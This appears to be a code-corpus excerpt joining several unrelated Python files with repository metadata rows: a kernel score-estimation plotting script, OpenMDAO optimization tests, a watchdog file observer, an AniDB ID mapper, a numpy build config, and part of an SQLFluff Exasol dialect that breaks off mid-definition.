# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import seaborn as sns
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import argparse
import sys
import kscore
from .utils import *
def generate_data(n_samples):
    """Draw `n_samples` noisy points from an Archimedean spiral."""
    angles = tf.random.uniform([n_samples], minval=3.0, maxval=15.0)
    jitter = tf.random.normal([n_samples, 2], stddev=np.exp(-1.0))
    xs = -2.0 + 2 * angles * tf.cos(angles)
    ys = 2 * angles * tf.sin(angles)
    return tf.linalg.matrix_transpose([xs, ys]) + jitter
def main(args):
    """Fit a kernel score estimator on spiral data and plot the results."""
    # Fixed seeds for reproducible figures.
    tf.compat.v1.set_random_seed(1234)
    np.random.seed(1234)

    kernel_width = 8.0
    n_samples = args.n_samples

    # Grid resolutions: coarse for the vector field, fine for the energy map.
    size, energy_size = 25, 300
    lower_box, upper_box = -args.plot_range, args.plot_range

    samples = generate_data(n_samples)
    x = linspace_2d(size, lower_box, upper_box)
    x_energy = linspace_2d(energy_size, lower_box, upper_box)

    estimator = get_estimator(args)
    estimator.fit(samples, kernel_hyperparams=kernel_width)
    gradient = estimator.compute_gradients(x)
    # Only curl-free estimators expose an energy (log-density) surface.
    if 'curlfree' in args.kernel:
        energy = estimator.compute_energy(x_energy)
    else: energy = tf.constant(0.0)

    with tf.compat.v1.Session() as sess:
        samples, energy, gradient = sess.run([samples, energy, gradient])

    # plot energy
    if 'curlfree' in args.kernel:
        plt.figure(figsize=(4, 4))
        if args.clip_energy:
            energy = clip_energy(energy, threshold=args.clip_threshold)
        # Transpose + vertical flip to match imshow's image orientation.
        img = np.transpose(np.reshape(energy, [energy_size, energy_size]))
        img = np.flip(img, axis=0)
        plt.imshow(img, extent=[lower_box, upper_box, lower_box, upper_box])

    # plot the score field
    plt.figure(figsize=(4, 4))
    plt.scatter(samples[:,0], samples[:,1], 2)
    plot_vector_field(x, gradient)
    plt.show()
if __name__ == "__main__":
    # Seaborn styling for the figures.
    sns.set()
    sns.set_color_codes()
    sns.set_style("white")
    parser = argparse.ArgumentParser()
    add_estimator_params(parser)
    parser.add_argument('--n_samples', type=int, default=200, help='sample size.')
    parser.add_argument('--plot_range', default=32, type=int)
    # NOTE(review): argparse's type=bool is a known trap — bool('False') is
    # True, so any non-empty string enables clipping. Confirm intended usage.
    parser.add_argument('--clip_energy', default=True, type=bool,
                        help='whether to clip the energy function.')
    parser.add_argument('--clip_threshold', default=24, type=int)
    args = parser.parse_args(sys.argv[1:])
    main(args)
| 30.728395 | 82 | 0.682603 |
141914062467d4e7e29d5c548df2f0e66d757e0e | 3,145 | py | Python | openmdao/test_suite/test_examples/basic_opt_paraboloid.py | hwangjt/blue | 609defbe476c86a4a2eddd12977b47e649ea7f50 | [
"Apache-2.0"
] | null | null | null | openmdao/test_suite/test_examples/basic_opt_paraboloid.py | hwangjt/blue | 609defbe476c86a4a2eddd12977b47e649ea7f50 | [
"Apache-2.0"
] | null | null | null | openmdao/test_suite/test_examples/basic_opt_paraboloid.py | hwangjt/blue | 609defbe476c86a4a2eddd12977b47e649ea7f50 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function, division, absolute_import
import unittest
from openmdao.devtools.testutil import assert_rel_error
from openmdao.api import Problem, ScipyOptimizer, ExecComp, IndepVarComp
from openmdao.test_suite.components.paraboloid import Paraboloid
class BasicOptParaboloid(unittest.TestCase):
    """Documentation-example tests optimizing the Paraboloid component."""

    # NOTE(review): "unconstrainted" is a typo for "unconstrained"; kept
    # because the method name is part of the test-discovery interface.
    def test_unconstrainted(self):
        """Minimize f(x, y) with no constraints; minimum is at (20/3, -22/3)."""
        from openmdao.api import Problem, ScipyOptimizer, IndepVarComp

        # We'll use the component that was defined in the last tutorial
        from openmdao.test_suite.components.paraboloid import Paraboloid

        # build the model
        prob = Problem()
        indeps = prob.model.add_subsystem('indeps', IndepVarComp())
        indeps.add_output('x', 3.0)
        indeps.add_output('y', -4.0)

        prob.model.add_subsystem('paraboloid', Paraboloid())

        prob.model.connect('indeps.x', 'paraboloid.x')
        prob.model.connect('indeps.y', 'paraboloid.y')

        # setup the optimization
        prob.driver = ScipyOptimizer()
        prob.driver.options['optimizer'] = 'COBYLA'

        prob.model.add_design_var('indeps.x', lower=-50, upper=50)
        prob.model.add_design_var('indeps.y', lower=-50, upper=50)
        prob.model.add_objective('paraboloid.f_xy')

        prob.setup()
        prob.run_driver()

        # minimum value
        assert_rel_error(self, prob['paraboloid.f_xy'], -27.33333, 1e-6)

        # location of the minimum
        assert_rel_error(self, prob['indeps.x'], 6.6667, 1e-4)
        assert_rel_error(self, prob['indeps.y'], -7.33333, 1e-4)

    def test_constrained(self):
        """Same model with an extra constraint g = x + y in [0, 10]."""
        from openmdao.api import Problem, ScipyOptimizer, ExecComp, IndepVarComp

        # We'll use the component that was defined in the last tutorial
        from openmdao.test_suite.components.paraboloid import Paraboloid

        # build the model
        prob = Problem()
        indeps = prob.model.add_subsystem('indeps', IndepVarComp())
        indeps.add_output('x', 3.0)
        indeps.add_output('y', -4.0)

        prob.model.add_subsystem('parab', Paraboloid())

        # define the component whos output will be constrained
        prob.model.add_subsystem('const', ExecComp('g = x + y'))

        prob.model.connect('indeps.x', ['parab.x', 'const.x'])
        prob.model.connect('indeps.y', ['parab.y', 'const.y'])

        # setup the optimization
        prob.driver = ScipyOptimizer()
        prob.driver.options['optimizer'] = 'COBYLA'

        prob.model.add_design_var('indeps.x', lower=-50, upper=50)
        prob.model.add_design_var('indeps.y', lower=-50, upper=50)
        prob.model.add_objective('parab.f_xy')

        # to add the constraint to the model
        prob.model.add_constraint('const.g', lower=0, upper=10.)
        # prob.model.add_constraint('const.g', equals=0.)

        prob.setup()
        prob.run_driver()

        # minimum value
        assert_rel_error(self, prob['parab.f_xy'], -27., 1e-6)

        # location of the minimum
        assert_rel_error(self, prob['indeps.x'], 7, 1e-4)
        assert_rel_error(self, prob['indeps.y'], -7, 1e-4)
if __name__ == "__main__":
unittest.main() | 33.457447 | 80 | 0.652782 |
6556182cd762cff3d6af86ccd335d67cf4438847 | 1,821 | py | Python | controller/_observer.py | adc21/snap-controller | e1c6131859d6ec602e5c8521de41e6e4c9608554 | [
"MIT"
] | 2 | 2021-04-21T15:22:23.000Z | 2021-05-12T01:45:43.000Z | controller/_observer.py | adc21/snap-controller | e1c6131859d6ec602e5c8521de41e6e4c9608554 | [
"MIT"
] | null | null | null | controller/_observer.py | adc21/snap-controller | e1c6131859d6ec602e5c8521de41e6e4c9608554 | [
"MIT"
] | null | null | null | import os
import time
from typing import Callable, List
from watchdog.events import FileSystemEventHandler, FileSystemEvent
from watchdog.observers import Observer
from .logger import logger
from .utils import get_dir_regex
from .types import SnapDirPrefixType
class FileEventHandler(FileSystemEventHandler):
    """Watchdog handler forwarding file-creation events to a callback."""

    def __init__(self, on_created: Callable[[FileSystemEvent], None] = None):
        # on_created: optional callback invoked for every creation event.
        super().__init__()
        self.on_created_callback = on_created

    # The triple-quoted blocks below are handler methods deliberately
    # disabled for now; they are inert string expressions, not docstrings.
    """
    def on_any_event(self, event):
        print(event.event_type, event.src_path)
    """

    def on_created(self, event):
        # Log every creation, then delegate to the optional callback.
        print("on_created", event.src_path)
        if self.on_created_callback: self.on_created_callback(event)

    """
    def on_deleted(self, event):
        print("on_deleted", event.src_path)

    def on_modified(self, event):
        print("on_modified", event.src_path)

    def on_moved(self, event):
        print("on_moved", event.src_path)
    """
def _add_schedule(observer: Observer, path: str, on_created: Callable[[FileSystemEvent], None]):
    # Register a recursive watch on `path`, routing creation events to
    # `on_created` via a FileEventHandler.
    event_handler = FileEventHandler(on_created)
    observer.schedule(event_handler, path, recursive=True)
def run_observer(work_dir: str, target_files: List[str], on_created: Callable[[FileSystemEvent], None]):
    """Watch *work_dir* recursively and call *on_created* when a target file appears.

    Blocks until interrupted with Ctrl-C (KeyboardInterrupt); the watchdog
    observer is always stopped and joined on exit.

    :param work_dir: directory tree to watch.
    :param target_files: basenames that should trigger the callback.
    :param on_created: callback receiving the raw FileSystemEvent.
    """
    observer = Observer()
    # Hoist the membership collection out of the per-event handler:
    # O(1) lookups instead of scanning the list on every event.
    targets = set(target_files)

    def _on_target_file_created(event: FileSystemEvent):
        path = event.src_path
        basename = os.path.basename(path)
        # Was a leftover `print("test", path)` debug line; demoted to debug logging.
        logger.debug("File created: %s", path)
        if os.path.isfile(path) and basename in targets:
            logger.info(f"Target file {basename} created")
            on_created(event)

    _add_schedule(observer, work_dir, _on_target_file_created)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    finally:
        # Always stop/join so watcher threads are cleaned up even if an
        # unexpected exception escapes the wait loop (the original only
        # stopped on KeyboardInterrupt).
        observer.stop()
        observer.join()
337ddae236738829f14eed3418d4a12fdf54477f | 194 | py | Python | Small Projects/Math/add.py | Sudo2td/Andromeda | aa34dea5ba99b510cb0645c835c4fce7f0407b80 | [
"MIT"
] | null | null | null | Small Projects/Math/add.py | Sudo2td/Andromeda | aa34dea5ba99b510cb0645c835c4fce7f0407b80 | [
"MIT"
] | null | null | null | Small Projects/Math/add.py | Sudo2td/Andromeda | aa34dea5ba99b510cb0645c835c4fce7f0407b80 | [
"MIT"
] | null | null | null | print("Add Numbers")
first_number = input("Enter First Number: ")
second_number = input("Enter Second Number: ")
print(float(first_number) + float(second_number))
input("Press Enter to Exit: ") | 32.333333 | 49 | 0.742268 |
72fe6c3a60af8d84132dbb43b76266a0ca6b27e8 | 7,173 | py | Python | modules/anidb.py | maciejzgadzaj/Plex-Meta-Manager | f25a13982d350d09ef18ec55dc93487676f5651a | [
"MIT"
] | null | null | null | modules/anidb.py | maciejzgadzaj/Plex-Meta-Manager | f25a13982d350d09ef18ec55dc93487676f5651a | [
"MIT"
] | null | null | null | modules/anidb.py | maciejzgadzaj/Plex-Meta-Manager | f25a13982d350d09ef18ec55dc93487676f5651a | [
"MIT"
] | null | null | null | import logging, requests
from lxml import html
from modules import util
from modules.util import Failed
from retrying import retry
logger = logging.getLogger("Plex Meta Manager")
class AniDBAPI:
def __init__(self, Cache=None, TMDb=None, Trakt=None):
self.Cache = Cache
self.TMDb = TMDb
self.Trakt = Trakt
self.urls = {
"anime": "https://anidb.net/anime",
"popular": "https://anidb.net/latest/anime/popular/?h=1",
"relation": "/relation/graph"
}
self.id_list = html.fromstring(requests.get("https://raw.githubusercontent.com/Anime-Lists/anime-lists/master/anime-list-master.xml").content)
def convert_anidb_to_tvdb(self, anidb_id): return self.convert_anidb(anidb_id, "anidbid", "tvdbid")
def convert_anidb_to_imdb(self, anidb_id): return self.convert_anidb(anidb_id, "anidbid", "imdbid")
def convert_tvdb_to_anidb(self, tvdb_id): return self.convert_anidb(tvdb_id, "tvdbid", "anidbid")
def convert_imdb_to_anidb(self, imdb_id): return self.convert_anidb(imdb_id, "imdbid", "anidbid")
def convert_anidb(self, input_id, from_id, to_id):
ids = self.id_list.xpath("//anime[contains(@{}, '{}')]/@{}".format(from_id, input_id, to_id))
if len(ids) > 0:
if from_id == "tvdbid": return [int(id) for id in ids]
if len(ids[0]) > 0:
try: return ids[0].split(",") if to_id == "imdbid" else int(ids[0])
except ValueError: raise Failed("AniDB Error: No {} ID found for {} ID: {}".format(util.pretty_ids[to_id], util.pretty_ids[from_id], input_id))
else: raise Failed("AniDB Error: No {} ID found for {} ID: {}".format(util.pretty_ids[to_id], util.pretty_ids[from_id], input_id))
else: raise Failed("AniDB Error: {} ID: {} not found".format(util.pretty_ids[from_id], input_id))
@retry(stop_max_attempt_number=6, wait_fixed=10000)
def send_request(self, url, language):
return html.fromstring(requests.get(url, headers={"Accept-Language": language, "User-Agent": "Mozilla/5.0 x64"}).content)
def get_popular(self, language):
response = self.send_request(self.urls["popular"], language)
return util.get_int_list(response.xpath("//td[@class='name anime']/a/@href"), "AniDB ID")
def validate_anidb_id(self, anidb_id, language):
response = self.send_request("{}/{}".format(self.urls["anime"], anidb_id), language)
ids = response.xpath("//*[text()='a{}']/text()".format(anidb_id))
if len(ids) > 0:
return util.regex_first_int(ids[0], "AniDB ID")
raise Failed("AniDB Error: AniDB ID: {} not found".format(anidb_id))
def get_anidb_relations(self, anidb_id, language):
response = self.send_request("{}/{}{}".format(self.urls["anime"], anidb_id, self.urls["relation"]), language)
return util.get_int_list(response.xpath("//area/@href"), "AniDB ID")
def validate_anidb_list(self, anidb_list, language):
anidb_values = []
for anidb_id in anidb_list:
try:
anidb_values.append(self.validate_anidb_id(anidb_id, language))
except Failed as e:
logger.error(e)
if len(anidb_values) > 0:
return anidb_values
raise Failed("AniDB Error: No valid AniDB IDs in {}".format(anidb_list))
def get_items(self, method, data, language, status_message=True):
pretty = util.pretty_names[method] if method in util.pretty_names else method
if status_message:
logger.debug("Data: {}".format(data))
anime_ids = []
if method == "anidb_popular":
if status_message:
logger.info("Processing {}: {} Anime".format(pretty, data))
anime_ids.extend(self.get_popular(language)[:data])
else:
if status_message: logger.info("Processing {}: {}".format(pretty, data))
if method == "anidb_id": anime_ids.append(data)
elif method == "anidb_relation": anime_ids.extend(self.get_anidb_relations(data, language))
else: raise Failed("AniDB Error: Method {} not supported".format(method))
show_ids = []
movie_ids = []
for anidb_id in anime_ids:
try:
tmdb_id = self.convert_from_imdb(self.convert_anidb_to_imdb(anidb_id), language)
if tmdb_id: movie_ids.append(tmdb_id)
else: raise Failed
except Failed:
try: show_ids.append(self.convert_anidb_to_tvdb(anidb_id))
except Failed: logger.error("AniDB Error: No TVDb ID or IMDb ID found for AniDB ID: {}".format(anidb_id))
if status_message:
logger.debug("AniDB IDs Found: {}".format(anime_ids))
logger.debug("TMDb IDs Found: {}".format(movie_ids))
logger.debug("TVDb IDs Found: {}".format(show_ids))
return movie_ids, show_ids
def convert_from_imdb(self, imdb_id, language):
output_tmdb_ids = []
if not isinstance(imdb_id, list):
imdb_id = [imdb_id]
for imdb in imdb_id:
if self.Cache:
tmdb_id, tvdb_id = self.Cache.get_ids_from_imdb(imdb)
expired = False
if not tmdb_id:
tmdb_id, expired = self.Cache.get_tmdb_from_imdb(imdb)
if expired:
tmdb_id = None
else:
tmdb_id = None
from_cache = tmdb_id is not None
if not tmdb_id and self.TMDb:
try: tmdb_id = self.TMDb.convert_imdb_to_tmdb(imdb)
except Failed: pass
if not tmdb_id and self.Trakt:
try: tmdb_id = self.Trakt.convert_imdb_to_tmdb(imdb)
except Failed: pass
try:
if tmdb_id and not from_cache: self.TMDb.get_movie(tmdb_id)
except Failed: tmdb_id = None
if tmdb_id: output_tmdb_ids.append(tmdb_id)
if self.Cache and tmdb_id and expired is not False:
self.Cache.update_imdb("movie", expired, imdb, tmdb_id)
if len(output_tmdb_ids) == 0: raise Failed("AniDB Error: No TMDb ID found for IMDb: {}".format(imdb_id))
elif len(output_tmdb_ids) == 1: return output_tmdb_ids[0]
else: return output_tmdb_ids
| 56.480315 | 192 | 0.549003 |
92becfca505c22e7e22accda031a221e087d6d34 | 1,551 | py | Python | lib/python2.7/site-packages/numpy/distutils/__config__.py | vishwabasak41/praicopy2 | 45fca251608d1621e75bfcc963bf5ff29d695336 | [
"MIT"
] | 7 | 2017-10-26T00:23:17.000Z | 2021-01-21T06:27:46.000Z | lib/python2.7/site-packages/numpy/distutils/__config__.py | vishwabasak41/praicopy2 | 45fca251608d1621e75bfcc963bf5ff29d695336 | [
"MIT"
] | 12 | 2017-05-23T22:54:50.000Z | 2019-07-31T17:26:17.000Z | lib/python2.7/site-packages/numpy/distutils/__config__.py | vishwabasak41/praicopy2 | 45fca251608d1621e75bfcc963bf5ff29d695336 | [
"MIT"
] | 5 | 2017-05-23T00:44:10.000Z | 2019-10-23T14:57:35.000Z | # This file is generated by numpy's setup.py
# It contains system_info results at the time of building this package.
__all__ = ["get_info","show"]
import os
import sys
extra_dll_dir = os.path.join(os.path.dirname(__file__), '.libs')
if sys.platform == 'win32' and os.path.isdir(extra_dll_dir):
os.environ.setdefault('PATH', '')
os.environ['PATH'] += os.pathsep + extra_dll_dir
lapack_opt_info={'libraries': ['openblas', 'openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]}
blas_opt_info={'libraries': ['openblas', 'openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]}
blis_info={}
openblas_info={'libraries': ['openblas', 'openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]}
openblas_lapack_info={'libraries': ['openblas', 'openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]}
lapack_mkl_info={}
blas_mkl_info={}
def get_info(name):
g = globals()
return g.get(name, g.get(name + "_info", {}))
def show():
for name,info_dict in globals().items():
if name[0] == "_" or type(info_dict) is not type({}): continue
print(name + ":")
if not info_dict:
print(" NOT AVAILABLE")
for k,v in info_dict.items():
v = str(v)
if k == "sources" and len(v) > 200:
v = v[:60] + " ...\n... " + v[-60:]
print(" %s = %s" % (k,v))
| 43.083333 | 154 | 0.607995 |
b07482791437554a019a5180bdcd3d417d94e483 | 103,021 | py | Python | src/sqlfluff/dialects/dialect_exasol.py | quannh-uet/sqlfluff | 982aef19ab537e256ddc7e6fb2ac095e30959e4b | [
"MIT"
] | 1 | 2021-12-23T06:39:14.000Z | 2021-12-23T06:39:14.000Z | src/sqlfluff/dialects/dialect_exasol.py | quannh-uet/sqlfluff | 982aef19ab537e256ddc7e6fb2ac095e30959e4b | [
"MIT"
] | 1 | 2021-09-15T18:20:39.000Z | 2021-09-15T18:20:39.000Z | src/sqlfluff/dialects/dialect_exasol.py | tunetheweb/sqlfluff | 9504fc28af3142f3e4915b0adf5e31746df06e43 | [
"MIT"
] | null | null | null | """The EXASOL dialect.
https://docs.exasol.com
https://docs.exasol.com/sql_references/sqlstandardcompliance.htm
"""
from sqlfluff.core.parser import (
AnyNumberOf,
Anything,
BaseSegment,
Bracketed,
OptionallyBracketed,
BaseFileSegment,
Dedent,
Delimited,
GreedyUntil,
Indent,
KeywordSegment,
Nothing,
OneOf,
Ref,
Sequence,
StartsWith,
RegexLexer,
StringLexer,
CodeSegment,
CommentSegment,
NamedParser,
SymbolSegment,
StringParser,
RegexParser,
NewlineSegment,
)
from sqlfluff.core.dialects import load_raw_dialect
from sqlfluff.core.parser.segments.generator import SegmentGenerator
from sqlfluff.dialects.dialect_exasol_keywords import (
BARE_FUNCTIONS,
RESERVED_KEYWORDS,
SESSION_PARAMETERS,
SYSTEM_PARAMETERS,
UNRESERVED_KEYWORDS,
)
ansi_dialect = load_raw_dialect("ansi")
exasol_dialect = ansi_dialect.copy_as("exasol")
# Clear ANSI Keywords and add all EXASOL keywords
exasol_dialect.sets("unreserved_keywords").clear()
exasol_dialect.sets("unreserved_keywords").update(UNRESERVED_KEYWORDS)
exasol_dialect.sets("reserved_keywords").clear()
exasol_dialect.sets("reserved_keywords").update(RESERVED_KEYWORDS)
exasol_dialect.sets("bare_functions").clear()
exasol_dialect.sets("bare_functions").update(BARE_FUNCTIONS)
exasol_dialect.sets("session_parameters").clear()
exasol_dialect.sets("session_parameters").update(SESSION_PARAMETERS)
exasol_dialect.sets("system_parameters").clear()
exasol_dialect.sets("system_parameters").update(SYSTEM_PARAMETERS)
exasol_dialect.insert_lexer_matchers(
[
RegexLexer("lua_nested_quotes", r"\[={1,3}\[.*\]={1,3}\]", CodeSegment),
RegexLexer("lua_multiline_quotes", r"\[{2}([^[\\]|\\.)*\]{2}", CodeSegment),
RegexLexer("udf_param_dot_syntax", r"\.{3}", CodeSegment),
RegexLexer("range_operator", r"\.{2}", CodeSegment),
StringLexer("hash", "#", CodeSegment),
StringLexer(
"walrus_operator",
":=",
CodeSegment,
segment_kwargs={"type": "walrus_operator"},
),
RegexLexer(
"function_script_terminator",
r"\n/\n|\n/$",
CodeSegment,
segment_kwargs={"type": "function_script_terminator"},
subdivider=RegexLexer(
"newline",
r"(\n|\r\n)+",
NewlineSegment,
),
),
RegexLexer("atsign_literal", r"@[a-zA-Z_][\w]*", CodeSegment),
RegexLexer("dollar_literal", r"[$][a-zA-Z0-9_.]*", CodeSegment),
],
before="not_equal",
)
exasol_dialect.patch_lexer_matchers(
[
# In EXASOL, a double single/double quote resolves as a single/double quote in the string.
# It's also used for escaping single quotes inside of STATEMENT strings like in the IMPORT function
# https://docs.exasol.com/sql_references/basiclanguageelements.htm#Delimited_Identifiers
# https://docs.exasol.com/sql_references/literals.htm
RegexLexer("single_quote", r"'([^']|'')*'", CodeSegment),
RegexLexer("double_quote", r'"([^"]|"")*"', CodeSegment),
RegexLexer(
"inline_comment",
r"--[^\n]*",
CommentSegment,
segment_kwargs={"trim_start": ("--")},
),
]
)
# Access column aliases by using the LOCAL keyword
exasol_dialect.add(
LocalIdentifierSegment=StringParser(
"LOCAL", KeywordSegment, name="local_identifier", type="identifier"
),
UDFParameterDotSyntaxSegment=NamedParser(
"udf_param_dot_syntax", SymbolSegment, type="identifier"
),
RangeOperator=NamedParser("range_operator", SymbolSegment, type="range_operator"),
UnknownSegment=StringParser(
"unknown", KeywordSegment, name="boolean_literal", type="literal"
),
ForeignKeyReferencesClauseGrammar=Sequence(
"REFERENCES",
Ref("TableReferenceSegment"),
Ref("BracketedColumnReferenceListGrammar", optional=True),
),
ColumnReferenceListGrammar=Delimited(
Ref("ColumnReferenceSegment"),
ephemeral_name="ColumnReferenceList",
),
CommentIsGrammar=Sequence("COMMENT", "IS", Ref("QuotedLiteralSegment")),
# delimiter doesn't work for DISTRIBUTE and PARTITION BY
# expression because both expressions are splitted by comma
# as well as n columns within each expression
TableDistributeByGrammar=StartsWith(
Sequence(
"DISTRIBUTE",
"BY",
AnyNumberOf(
Sequence(
Ref("CommaSegment", optional=True),
Ref("ColumnReferenceSegment"),
),
min_times=1,
),
),
terminator=OneOf(
Ref("TablePartitionByGrammar"),
Ref("DelimiterSegment"),
),
enforce_whitespace_preceding_terminator=True,
),
TablePartitionByGrammar=StartsWith(
Sequence(
"PARTITION",
"BY",
AnyNumberOf(
Sequence(
Ref("CommaSegment", optional=True),
Ref("ColumnReferenceSegment"),
),
min_times=1,
),
),
terminator=OneOf(
Ref("TableDistributeByGrammar"),
Ref("DelimiterSegment"),
),
enforce_whitespace_preceding_terminator=True,
),
TableConstraintEnableDisableGrammar=OneOf("ENABLE", "DISABLE"),
EscapedIdentifierSegment=RegexParser(
# This matches escaped identifier e.g. [day]. There can be reserved keywords
# within the square brackets.
r"\[[A-Z]\]",
CodeSegment,
name="escaped_identifier",
type="identifier",
),
SessionParameterSegment=SegmentGenerator(
lambda dialect: RegexParser(
r"^(" + r"|".join(dialect.sets("session_parameters")) + r")$",
CodeSegment,
name="session_parameter",
type="session_parameter",
)
),
SystemParameterSegment=SegmentGenerator(
lambda dialect: RegexParser(
r"^(" + r"|".join(dialect.sets("system_parameters")) + r")$",
CodeSegment,
name="system_parameter",
type="system_parameter",
)
),
UDFParameterGrammar=OneOf(
# (A NUMBER, B VARCHAR) or (...)
Delimited(Ref("ColumnDatatypeSegment")),
Ref("UDFParameterDotSyntaxSegment"),
),
EmitsGrammar=Sequence(
"EMITS",
Bracketed(Ref("UDFParameterGrammar")),
),
FunctionScriptTerminatorSegment=NamedParser(
"function_script_terminator", CodeSegment, type="function_script_terminator"
),
WalrusOperatorSegment=NamedParser(
"walrus_operator", SymbolSegment, type="assignment_operator"
),
VariableNameSegment=RegexParser(
r"[A-Z][A-Z0-9_]*",
CodeSegment,
name="function_variable",
type="variable",
),
)
exasol_dialect.replace(
SingleIdentifierGrammar=OneOf(
Ref("LocalIdentifierSegment"),
Ref("NakedIdentifierSegment"),
Ref("QuotedIdentifierSegment"),
Ref("EscapedIdentifierSegment"),
),
ParameterNameSegment=RegexParser(
r"\"?[A-Z][A-Z0-9_]*\"?",
CodeSegment,
name="parameter",
type="parameter",
),
LikeGrammar=Ref.keyword("LIKE"),
IsClauseGrammar=OneOf(
"NULL",
Ref("BooleanLiteralGrammar"),
),
SelectClauseSegmentGrammar=Sequence(
"SELECT",
Ref("SelectClauseModifierSegment", optional=True),
Indent,
Delimited(
Ref("SelectClauseElementSegment"),
allow_trailing=True,
optional=True, # optional in favor of SELECT INVALID....
),
OneOf(Ref("WithInvalidUniquePKSegment"), Ref("IntoTableSegment"), optional=True)
# NB: The Dedent for the indent above lives in the
# SelectStatementSegment so that it sits in the right
# place corresponding to the whitespace.
),
SelectClauseElementTerminatorGrammar=OneOf(
Sequence(
Ref.keyword("WITH", optional=True),
"INVALID",
OneOf("UNIQUE", Ref("PrimaryKeyGrammar"), Ref("ForeignKeyGrammar")),
),
Sequence("INTO", "TABLE"),
"FROM",
"WHERE",
Sequence("ORDER", "BY"),
"LIMIT",
Ref("CommaSegment"),
Ref("SetOperatorSegment"),
),
FromClauseTerminatorGrammar=OneOf(
"WHERE",
"CONNECT",
"START",
"PREFERRING",
"LIMIT",
Sequence("GROUP", "BY"),
Sequence("ORDER", "BY"),
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
WhereClauseTerminatorGrammar=OneOf(
"CONNECT",
"START",
"PREFERRING",
"LIMIT",
Sequence("GROUP", "BY"),
Sequence("ORDER", "BY"),
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
DateTimeLiteralGrammar=Sequence(
OneOf("DATE", "TIMESTAMP"), Ref("QuotedLiteralSegment")
),
CharCharacterSetSegment=OneOf(
Ref.keyword("UTF8"),
Ref.keyword("ASCII"),
),
PreTableFunctionKeywordsGrammar=Ref.keyword("TABLE"),
BooleanLiteralGrammar=OneOf(
Ref("TrueSegment"), Ref("FalseSegment"), Ref("UnknownSegment")
),
PostFunctionGrammar=OneOf(
Ref("EmitsGrammar"), # e.g. JSON_EXTRACT()
Sequence(
Sequence(OneOf("IGNORE", "RESPECT"), "NULLS", optional=True),
Ref("OverClauseSegment"),
),
),
)
############################
# SELECT
############################
@exasol_dialect.segment(replace=True)
class SelectStatementSegment(BaseSegment):
    """A `SELECT` statement.

    https://docs.exasol.com/sql/select.htm
    """
    type = "select_statement"
    # Cheap first-pass match: anything starting with SELECT, up to (but not
    # including) a set operator such as UNION / INTERSECT / MINUS / EXCEPT.
    match_grammar = StartsWith(
        "SELECT",
        terminator=Ref("SetOperatorSegment"),
        enforce_whitespace_preceding_terminator=True,
    )
    parse_grammar = Sequence(
        OneOf(
            # Branch 1: EXASOL's metadata-query form
            # `SELECT [WITH] INVALID FOREIGN KEY ...`, whose segment carries
            # its own FROM ... REFERENCING ... handling.
            Sequence(
                "SELECT",
                Ref("SelectClauseModifierSegment", optional=True),
                Indent,
                Delimited(
                    Ref("SelectClauseElementSegment", optional=True),
                    allow_trailing=True,
                    optional=True,
                ),
                Ref("WithInvalidForeignKeySegment"),
            ),
            # Branch 2: an ordinary select clause plus an optional FROM.
            Sequence(
                Ref("SelectClauseSegment"),
                # Dedent for the indent in the select clause. It's here so
                # that it can come AFTER any whitespace.
                Dedent,
                Ref("FromClauseSegment", optional=True),
            ),
        ),
        # Optional trailing clauses in EXASOL's documented order.
        Ref("WhereClauseSegment", optional=True),
        Ref("ConnectByClauseSegment", optional=True),
        Ref("PreferringClauseSegment", optional=True),
        Ref("GroupByClauseSegment", optional=True),
        Ref("HavingClauseSegment", optional=True),
        Ref("QualifyClauseSegment", optional=True),
        Ref("OrderByClauseSegment", optional=True),
        Ref("LimitClauseSegment", optional=True),
    )
@exasol_dialect.segment()
class WithInvalidUniquePKSegment(BaseSegment):
"""`WITH INVALID UNIQUE` or `WITH INVALID PRIMARY KEY` clause within `SELECT`."""
type = "with_invalid_unique_pk_clause"
match_grammar = StartsWith(
Sequence(
Ref.keyword("WITH", optional=True),
"INVALID",
OneOf("UNIQUE", Ref("PrimaryKeyGrammar")),
),
terminator="FROM",
)
parse_grammar = Sequence(
Ref.keyword("WITH", optional=True),
"INVALID",
OneOf("UNIQUE", Ref("PrimaryKeyGrammar")),
Ref("BracketedColumnReferenceListGrammar"),
)
@exasol_dialect.segment()
class WithInvalidForeignKeySegment(BaseSegment):
"""`WITH INVALID FOREIGN KEY` clause within `SELECT`."""
type = "with_invalid_foreign_key_clause"
match_grammar = StartsWith(
Sequence(
Ref.keyword("WITH", optional=True), "INVALID", Ref("ForeignKeyGrammar")
),
terminator=Ref("FromClauseTerminatorGrammar"),
)
parse_grammar = Sequence(
Ref.keyword("WITH", optional=True),
"INVALID",
Ref("ForeignKeyGrammar"),
Ref("BracketedColumnReferenceListGrammar"),
Dedent, # dedent for the indent in the select clause
"FROM",
Ref("TableReferenceSegment"),
"REFERENCING",
Ref("TableReferenceSegment"),
Ref("BracketedColumnReferenceListGrammar", optional=True),
)
@exasol_dialect.segment()
class IntoTableSegment(BaseSegment):
    """`INTO TABLE` clause within `SELECT` (materializes the result into a table)."""
    type = "into_table_clause"
    # Match runs from INTO TABLE up to the FROM keyword of the select.
    match_grammar = StartsWith(Sequence("INTO", "TABLE"), terminator="FROM")
    parse_grammar = Sequence("INTO", "TABLE", Ref("TableReferenceSegment"))
@exasol_dialect.segment(replace=True)
class TableExpressionSegment(BaseSegment):
"""The main table expression e.g. within a FROM clause."""
type = "table_expression"
match_grammar = OneOf(
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
Ref("TableReferenceSegment"),
Bracketed(Ref("SelectableGrammar")),
Ref("ValuesRangeClauseSegment"),
Ref("ValuesClauseSegment"),
Ref("ImportStatementSegment"), # subimport
Ref("ExplainVirtualSegment"),
)
@exasol_dialect.segment(replace=True)
class ValuesClauseSegment(BaseSegment):
"""A `VALUES` clause within in `WITH` or `SELECT`."""
type = "values_clause"
match_grammar = Sequence(
